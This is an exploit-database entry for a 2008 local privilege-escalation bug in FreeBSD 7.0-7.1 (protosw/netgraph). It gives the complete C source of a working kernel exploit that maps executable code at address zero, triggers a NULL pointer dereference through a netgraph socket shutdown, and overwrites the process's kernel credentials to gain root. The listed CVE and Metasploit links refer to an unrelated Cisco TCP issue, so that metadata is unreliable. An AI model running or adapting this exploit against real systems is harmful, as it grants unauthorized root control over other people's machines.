FreeBSD protosw Vulnerability Exploit

vendor:

FreeBSD

by:

Don 'north' Bailey

7.2

CVSS

HIGH

Privilege Escalation

264

CWE

Product Name: FreeBSD

Affected Version From: FreeBSD 7.0

Affected Version To: FreeBSD 7.1

Patch Exists: YES

Related CWE: CVE-2008-4609

CPE: o:freebsd:freebsd

Metasploit: https://www.rapid7.com/db/vulnerabilities/cisco-nx-os-cisco-sa-20090908-tcp24/, https://www.rapid7.com/db/vulnerabilities/cisco-sa-20090908-tcp24/

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: FreeBSD

2008

FreeBSD protosw Vulnerability Exploit

This exploit is for the FreeBSD protosw vulnerability which allows an attacker to overwrite the credential structure in the kernel. This will affect more than just the exploit's process, which is why this doesn't spawn a shell. When the exploit has finished, the login shell should have euid=0.

Mitigation:

The vulnerability can be mitigated by applying the patch provided by the vendor.

Source

Exploit-DB raw data:

/*
 * This is a quick and very dirty exploit for the FreeBSD protosw vulnerability
 * defined here: 
 * http://security.freebsd.org/advisories/FreeBSD-SA-08:13.protosw.asc
 *
 * This will overwrite your credential structure in the kernel. This will 
 * affect more than just the exploit's process, which is why this doesn't
 * spawn a shell. When the exploit has finished, your login shell should
 * have euid=0. 
 *
 * Enjoy, and happy holidays!
 *  - Don "north" Bailey (don.bailey@gmail.com) 12/25/2008
 */

#include <sys/mman.h>
#include <sys/time.h>
#include <sys/stat.h>
#include <sys/proc.h>
#include <sys/types.h>
#include <sys/param.h>
#include <sys/socket.h>
#include <netgraph/ng_socket.h>
#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>
#include <errno.h>

#define PAGES 1
#define PATTERN1 0x8f8f8f8f
#define PATTERN2 0x6e6e6e6e

typedef unsigned long ulong;
typedef unsigned char uchar;

int
x(void)
{
	struct proc * p = (struct proc * )PATTERN1;
	uint * i;

	while(1)
	{
		if(p->p_pid == PATTERN2)
		{
			i = (uint * )p->p_ucred;
			*++i = 0;
			break;
		}

		p = p->p_list.le_next;
	}

	return 1;
}

int
main(int argc, char * argv[])
{
	ulong addr;
	uchar * c;
	uchar * d;
	uint * i;
	void * v;
	int pid;
	int s;

	if(argc != 2)
	{
		fprintf(stderr, "usage: ./x <allproc>\n");
		return 1;
	}

	addr = strtoul(argv[1], 0, 0);

	v = mmap(
		NULL,
		(PAGES*PAGE_SIZE),
		PROT_READ|PROT_WRITE|PROT_EXEC, 
		MAP_ANON|MAP_FIXED, 
		-1, 
		0);
	if(v == MAP_FAILED)
	{
		perror("mmap");
		return 0;
	}

	c = v;
	d = (uchar * )x;
	while(1)
	{
		*c = *d;
		if(*d == 0xc3)
		{
			break;
		}

		d++;
		c++;
	}

	*c++ = 0xc3;

	c = v;
	while(1)
	{
		if(*(long * )c == PATTERN1)
		{
			*(c + 0) = addr >>  0;
			*(c + 1) = addr >>  8;
			*(c + 2) = addr >> 16;
			*(c + 3) = addr >> 24;
			break;
		}
		c++;
	}

	pid = getpid();
	while(1)
	{
		if(*(long * )c == PATTERN2)
		{
			*(c + 0) = pid >>  0;
			*(c + 1) = pid >>  8;
			*(c + 2) = pid >> 16;
			*(c + 3) = pid >> 24;
			break;
		}
		c++;
	}

	s = socket(PF_NETGRAPH, SOCK_DGRAM, NG_DATA);
	if(s < 0)
	{
		perror("socket");
		return 1;
	}

	shutdown(s, SHUT_RDWR);

	return 0;
}

// milw0rm.com [2008-12-28]